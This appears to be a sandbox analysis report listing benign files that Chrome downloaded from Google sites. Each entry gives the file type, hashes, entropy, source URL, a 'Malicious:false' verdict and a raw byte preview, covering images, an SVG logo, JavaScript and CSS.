                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x273, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):205761
                                                                                                                                                                                                                                                            Entropy (8bit):7.696724954274156
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5fUJ3w42K:aRNRNRyGFANIIEg42K
                                                                                                                                                                                                                                                            MD5:0EAA9A2D86008E6FA18A06F1B4D981A4
                                                                                                                                                                                                                                                            SHA1:C6EE26B7376F5373CBA7975B93DB60A0B2DE863D
                                                                                                                                                                                                                                                            SHA-256:E1AC1B61D32010F60166A81992964EF7D9A5AAF366127ED575CF45B7B61D6983
                                                                                                                                                                                                                                                            SHA-512:44923153A5ED33943A9E8C69B8D8E42037A560722A8ECFAF1815E057AE33DAF77347FC3D292FF7A3FC15A836925F45A1B88CCDEFC55CD127C17E8799C8202C4F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):23299
                                                                                                                                                                                                                                                            Entropy (8bit):7.9459590421501565
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:y2KEF9MbkKQ3qrOvfj2gpvIhgacy6x+AYlu8dwK9pfiJ9BubH4JWZZArjmqmXTHa:y2KEF6AKLOzZpvvactx8zy9BuUJlPmD2
                                                                                                                                                                                                                                                            MD5:D9A71569EB1C3ADF9F64BC79946CEE78
                                                                                                                                                                                                                                                            SHA1:E3AF00613D1B79030EED2AD7EF573B8DD65D0492
                                                                                                                                                                                                                                                            SHA-256:8EA7A334E37E521D46EAA0A07052A6E92CCA60E7425682D5B2B7FF9F92D48A3E
                                                                                                                                                                                                                                                            SHA-512:6808CBAA46A53A89E149FA843F7E808C90036081B43B1AFF84BD85536F2A20B82335E2B586D839EB2F570E6397DB84B5DB6B140507BE89BF00791873EE294405
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/m-Ok3vfGKDPtv6u7QjPVLMFAw1rXk28qMAEujh1qRxXf4eHUZlVsV27Sqgqh7Ck98YX5OFCRc6ZjGyyaihts5C8IASljQdoGjnD8M_g5Il4W2eorQw=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................M...."..........................................S........................."2.BRbr.#....3....CS.....!$cs...%1A...4QTUaq.5Dd..E.....................................6........................"2.!B.1Rb.#AQCr...S...3ac...............?...."..9c.-.b$...o.Ve,.(h.. ..~t...vP..........u......m|...`..H.l(.....{[R.O".!J....m(7..>6'.I ....w.....6......]..).=...1...N.R4 .P. ..Z..(9.6)a...XZM...m.@l.8V.......,.D..s.'.qp.A.V.N.n...@\*.k..S.R%.R."..)oW%.4..1I....n(..b......F+".p.pP..Z.k.k.@..V..Y-f.b.Y..*... .VE7.Z...QY..R.....}U..).b}S..),1J...dB.w....J.h/..^kWRl....H?....I....%k.o#...=.......UR.w...Sul;Sw.D}T.`..5'.....|)F...n.ktRF.........$...9.2....Z..:SZ......*~.3..-.TI&..cb.*!{.J..4W.h..~.....R..N.g...S....Ah.....p.a..Ic.....d..J..p....(.KW.!G..........p.......=d.bD.... [2.....B. .9=.....g\.%.]!P....imV...jn.........
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):223695
                                                                                                                                                                                                                                                            Entropy (8bit):7.741067817232325
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+54F+DoL6K85/:aRNRNRyGFANIIK+kd8l
                                                                                                                                                                                                                                                            MD5:5240F30B825804985787A8FEF9AB3FAF
                                                                                                                                                                                                                                                            SHA1:CF0660B5C62A6BC4ABD4A00D04A9AB2F02B826F8
                                                                                                                                                                                                                                                            SHA-256:9726CA0579FF0FAC38F826AFE5CD2DF2DC0846492C2CE9FCAD49B64FDF548785
                                                                                                                                                                                                                                                            SHA-512:53EE47E99FF7FEB48787B23F560172E4CB278DA05246805181E36E15343F4F90B453A84121BB0AF4C380AAABEA8A4D2F0D17BCE1F9EF290F084DC81A0BEC31E5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/olVhV9gmfm07h0ru15ZgIm_kj58lRl3-RqqhYS1pqIEmSscfm8zYw5jxXWF9D4VSXBvVj5SBgeq_ohAvAl5d7UvUYMBvynL_3s50N_4mKg=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1130)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):268033
                                                                                                                                                                                                                                                            Entropy (8bit):5.485406013510922
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:PnKD7A79DGWoD3otH8631ugVqYpGeAdQ9Em8:qtWCG1u5sGxK8
                                                                                                                                                                                                                                                            MD5:2E77C147C2CD61733CC01F36E81CF1D0
                                                                                                                                                                                                                                                            SHA1:B2E353B6A2894E34390F1B2146BB82D20E7DAADF
                                                                                                                                                                                                                                                            SHA-256:B8F6C5677743CC758366D1515E2518C62619AD757F1DF1BFDA3D9C935272CF9E
                                                                                                                                                                                                                                                            SHA-512:D0D031049973E02083C4C0B0A700AA76A4CCC753BF56A0531A3721F96169DB2FD840D11E6F608FDA8375AF9D10271C9AED83BC0D634259A12EEFF4324EB3D26C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.DLVh3rihYK8.es5.O/ck=boq-one-google.OneGoogleWidgetUi.xIgYPDjrJ0Y.L.B1.O/am=gNcGAAAE/d=1/exm=_b,_r,_tp/excm=_b,_r,_tp,calloutview/ed=1/wt=2/rs=AM-SdHvKPgeuANF_DFsbYkEVpPrE38ImwA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;xqZiqf:wmnU7d;zxnPse:GkRiKb;EVNhjf:pw70Gc;NSEoX:lazG7b;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=n73qwf,ws9Tlc,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,COQbmf,fKUV3e,aurFic,U0aPgd,ZwDk9d,V3dDOb,mI3LFb,O6y8ed,PrPYRd,MpJwZc,LEikZe,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,mdR7q,wmnU7d,Z5uLle,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,KG2eXe,MdUzUe,VwDzFe,zbML3c,zr1jrb,lsPsHb,A7fCU,hnN99e,Uas9Hd,yYB61,pjICDe"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".KL4X6e{background:#eee;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:.8}sentinel{}");.this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.Ey=function(a){_.Jn.call(this);this.i=a||window;this.j=_.An(this.i,"resize",this.o,!1,this);this.l=_.gj(this.i)};_.Mg(_.Ey,_.Jn);_.Ey.prototype.ab=function(){_.Ey.Jc.ab.call(this);this.j&&(_.Hn(this.j),this.j=null);this.l=this.i=null};_.Ey.prototype.o=function(){var a=_.gj(this.i);_.Pi(a,this.l)||(this.l=a,this.dispatchEvent("resize"))};._.p("n73qwf");.var Hy;_.Fy=function(a){a=a.i;return a.parentWindow||a.defaultView};_.Gy=function(a,b,c,d){var e;return e=_.er(a,b,function(f){_.fr(e);return c.call(d,f)},null)};.Hy=function(a){_.Jn.call(this);this.l=a?_.Fy(a):window;this.H=1.5<=this.l.devicePixelRatio?2:1;this.j=(0,_.F)(this.T,this);this.o=null;(this.i=this.l.matchMedia?this.l.matchMedia("(min-resolution: 1.5dppx), (-webkit-min-device-pixel-rat
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 105 x 105, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):4173
                                                                                                                                                                                                                                                            Entropy (8bit):7.8956953682709505
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:W/RQ6HCkz6LvFaUsPiUhOf3a0PxzRvPjAAPPwbLwqcyNDTO:W/u6HCkJUxOOfq2RXjzPPw4IO
                                                                                                                                                                                                                                                            MD5:DBD0D89B37A1FF75D8C666187AD4A6A4
                                                                                                                                                                                                                                                            SHA1:B1685C4D61AA02DB3AF15399B599454F7FCB01D0
                                                                                                                                                                                                                                                            SHA-256:D2C4C0B0A294C3B9F96A6FBDE8C38D8E8C74E84111F8F48CB5C628A568C35D26
                                                                                                                                                                                                                                                            SHA-512:BE38E7BAB4A5B88A8ED114777E9D558FD10D326138582C68E1FE7E523E6C689B75DC3C498F9BD6BC73438D3C70ACAF7178B9E210A8333D42D6A1CD972AD09E6B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/42/46/7db920244e2084b10251e7f41961/logo-translate-lg.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...i...i.....9..:....IDATx....S.g...l.&.7..J....}./..n.$..b..x!.l.71...\r.9..FE4b...#.....0.s...-h.a.q+....>Ow..z.{.{....o.B.5.._?.=./.@../..R.. M|T.........r.{..]L...-.aV.kI5.<P.W.n....T...5....=#/..|=.G.....O]\...Oa.W........f{W..,.f..6cb.Oaz..D.@Kk<......2$,|H...K..].....H....>..j\!....e....P..;Z....BJ.=.6....M$.yq....Y.(. .U..$.y......".....i."$.yq.D.U..8..0.."...H..F....z<.1D..6.0.U$.yq.4O.Pd.G.t..Eq...J.4O.Hz.I.:.H......B..R...#......W.H..@..G.H.).....I#.(b...p.?.H.+.<.....U.~.M.y.$....4.6y.}~."I.Db.I#M.y...#......*..+f...+...............=.....v..}....v..]..}..!..y.....Sx..G=..U.@%....~0....=...?.{...!..b.`.n.v..u..$.8...U.HK5.p.]...7.B."..K...NPH.4L....p.._E..y.......H#.......P.%.A")....*.........;w..........B.4;J@.H8.::.`6...t../.(.HV..n.H.%q...U?.u....8..0P.=........{.]E.42.Z..7X.l...r....Hv...H.5.v...8..|..v_d@.?.?....<....'.f........U4....i.M..s:.*.H."..l./...\..d.4^s..(....B>.R.....w..f.._M$.}.....a.W.o.a
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                            Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                            MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                            SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                            SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                            SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/img/glue-google-color-logo.svg
                                                                                                                                                                                                                                                            Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 287, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):152666
                                                                                                                                                                                                                                                            Entropy (8bit):7.991279406237605
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:pm+dcBQUElIYtMf/Gew3KOyv5Ydf4YYdzKbgFflP19QqfL4Sa:p9+JEIGI/psKOmyqYuJlt9Qqj4p
                                                                                                                                                                                                                                                            MD5:4BD24A5FFB510C5545075B22F99D246E
                                                                                                                                                                                                                                                            SHA1:F05AC93818EF8ABDFFD4A2A927A6A99A5B9545BB
                                                                                                                                                                                                                                                            SHA-256:03CA8CBC779E690482BAC72477E2ECDD7A0D32FDA43F67CFA8781453474FF1AF
                                                                                                                                                                                                                                                            SHA-512:C09FDDDC12BF0AE2693A9941BB711DE51DCA8E2ED3FB2CEE603A38002B71E7356703AA2A6D3EDCDA1741157BFC680FEB9100B1B9FACC5B24CFAF74CB2FAE3C68
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............r.~....iCCPicc..H...wTT.....................a..E...."........"QT,X..`.....,.Py.H....uf..7g.....@.....PQ..4....RhX..i.h....@..V..|}.....?..m@f....^.......U<.$.c.O L.....4.,.c..bCa.q..s<;1...YmnO......2...........c}.....D.`<.....4.M...&.g...{..Wb:..c-.V.q..lQ_.......r..srR:..g...zLJP..e.%....I..Y.....JL....=..:.\...S..XE<.!..z.z..uJ.L.b{b0...8.......".._.....o.p._.(......}....0s.Z.x..y.?.E.*0.......z`..`..............M..ka..A.l..P.{....a8.mp.......p......S..70. ..a ,D.QD..]... .....#aH$.GR.td-..)@J.Jd.R....G. ..>..2.L /..(...lT..@.P..z...2......\t.Z....V..z.....O.)..h8I.2N...9.|p.X......+....p..n.......=..g..zxk.;>...........V.9...0~.... ..t.V..B(.O.$....u...y.-.(...H.$j.-...0b.q......L<M.#...H$.4I.dC.!qIi.<R.......4JzG.....dWr89..C.#7.;...1.4E..N...P.).".~J..:e.2M..jRm.....&j9..z.....F...,i~.x.FZ9..."m....N.;.#...m.......W..C.a..g.1.1..g....DX".".".".D.DZE.E.3)Lu..s9s5..y.y..L.".!.$..]/Z%z\t@tJ.%f$.#.,V(. vIl\.$.!.".-.+^
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):205604
                                                                                                                                                                                                                                                            Entropy (8bit):7.70038313909253
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5OQlNuJL4:aRNRNRyGFANIIwTL4
                                                                                                                                                                                                                                                            MD5:EED5C6191887EEAE3A7FE2D08DC9E5B4
                                                                                                                                                                                                                                                            SHA1:17C2DDD1E0E82AF7A89AE7938A248177DDD990A0
                                                                                                                                                                                                                                                            SHA-256:B4E331F483ADA93F9059D637EA5E3B5F2B5B363444DAB62EAAA5E95C0923C9E2
                                                                                                                                                                                                                                                            SHA-512:526C2BC33803A11FB49051788269C6F801161384BA00BBB5550C5E2CEA00C928C8C9CE79ED156534EC3159ED58AF5AA492CC6F5B06BE9326EE20EAEA87F1EC83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):65556
                                                                                                                                                                                                                                                            Entropy (8bit):7.959436720456734
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:pwzVQMFk4sC7PkHT+43/Own+jldHPYAzWSgBZeeIwW8wFdcMa:pZMFhsC7ET+M//+jbYBSgjeeI3s
                                                                                                                                                                                                                                                            MD5:5B3ECF25EFA73254E094E8E31B7E6994
                                                                                                                                                                                                                                                            SHA1:A533B3C0C7EB52505D059CB38A25262310688EAA
                                                                                                                                                                                                                                                            SHA-256:C1739E9DF7512F04A856C86E30B613C7E864E04D330ABA02A9218F4EA5ECA8F0
                                                                                                                                                                                                                                                            SHA-512:1D7640108E12482AD4F6E98B81ABFE8586838FE1122AA0C1C85F8119F2E7A76906BE54C7E6D5BB8F8E761958440803A3027672BA85135BCCC1B9FA28C2DE719F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE.........x..n............y..~...........c.................I..,3,.tk.Y9.uL...............}]A..q......mV..............m....w\..........dJ.....w@................................C.[................b.q%.s...6..t.H.._.....{B.......j...........~.h8.:..pI..W.`..R.......Y'..R.o.p.....W...v...|....*..{.....H..6.....H....;r.....f<.]....j.f......Ol.Rw..d....."...,[.^..5h.......V..by..Z...y...J....l......X..t......5..*..N...........Cc...}....%..5...*J..._.-u..k<U.K^..D.+".!....b....N.<s.......'...~.I......x.uO.._o....NAjj{T..q..T..B..,<......[.7.Q..)........e..|.....[..<...v.....V<+..M.......\..<....r..q.........m...n....f......Q._...y....].............H....`.n(.......^.o...>|.p.H.....g...........p......P..>.{).o..h6.B..V..C.}...A.....tRNS..s....b>.............,.........................1....IDATx...m.0.@.@|4..Rh...%q.......2.|.r.....................................c....1..!....).c.Q+.y^.r...^....Ug.fu..b...C...(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                                            Entropy (8bit):4.951991138198738
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:OnuZoS8/ZoSokiC1a2fQDthGD21G7RBD3/:OnuZoS8/ZoS7iC1bfQGqABDP
                                                                                                                                                                                                                                                            MD5:A5F67D3A813421BFE50F77CC61AAABD2
                                                                                                                                                                                                                                                            SHA1:0CFA051F7341BD32B0EEBFC94D291C876BE24308
                                                                                                                                                                                                                                                            SHA-256:E27CAA37DB83BEDE10251C4F097EAEE5A5F2919E05BEAB48604BFE09B14A462B
                                                                                                                                                                                                                                                            SHA-512:53F1926F5C5E7C2F01E1C156FF21182CAAE71F12A3C41C4E543B2D660127BF028EA55BA5B62F331C3F5B9DBDA996CDB6070155D59223EF7A504E8AE2F1A89F95
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTA0LjAuNTExMi44MRIlCb1oPomdcSFwEgUNkWGVThIFDZFhlU4SBQ1TVYG1EgUNrQmusRIXCezASBHVhUwMEgUNkWGVThIFDZFhlU4SFwkdvmsJn08oxxIFDVNVgbUSBQ2tCa6x?alt=proto
                                                                                                                                                                                                                                                            Preview:CiQKBw2RYZVOGgAKBw2RYZVOGgAKBw1TVYG1GgAKBw2tCa6xGgAKEgoHDZFhlU4aAAoHDZFhlU4aAAoSCgcNU1WBtRoACgcNrQmusRoA
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):716921
                                                                                                                                                                                                                                                            Entropy (8bit):5.137601975086034
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:WIGQ/GQbGQ0k77Ft+OvKdR/km76tmOoKeR0+eF:Wk77Ft+OvKdR/km76tmOoKeRM
                                                                                                                                                                                                                                                            MD5:785C5881DF764CBB4447F2A88EF11DBB
                                                                                                                                                                                                                                                            SHA1:9E0AF63F88C52E74C243480187AF726804D7B915
                                                                                                                                                                                                                                                            SHA-256:42F0D3866ABBBC492E86DB84AB8DAC81CA911E69951CF26E6A6C49B6F9C93C26
                                                                                                                                                                                                                                                            SHA-512:8C678E5BBC4547EEA4ADE19EE60E2C4C8F3F0C7AC4639125CDD3B6F0D3700ABC510159393347A946C391DAA6DBDB6E414B5BEC157ADA8786966723D0A715515B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/css/index.min.css?cache=9e0af63
                                                                                                                                                                                                                                                            Preview:@charset "UTF-8";/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:0 0}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{co
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (696)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):3397
                                                                                                                                                                                                                                                            Entropy (8bit):5.259154059221626
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UMd2uL6+ikXU5pf/+c/fI2Q2h3W7Z+ynXD4Cw/7P:7d78USI2Q26+ynXPYD
                                                                                                                                                                                                                                                            MD5:5BC68E1D57FA53F248F226D6974E076F
                                                                                                                                                                                                                                                            SHA1:51E159CD8614936C8D6661F07FC3468336277BC0
                                                                                                                                                                                                                                                            SHA-256:748442D5EEB02E6BF26E65F27D1573B99F485AC1E1C8377D4EBF7FBDF1066CF3
                                                                                                                                                                                                                                                            SHA-512:526BE839473089F50A6290A9BE6E150E3B497C80FA50F545E2EF4CF0CCC0DC4B7816347C98EC3483B12CEF2F881CB9197E0C4B774CDC26E9E62286C6198A3374
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
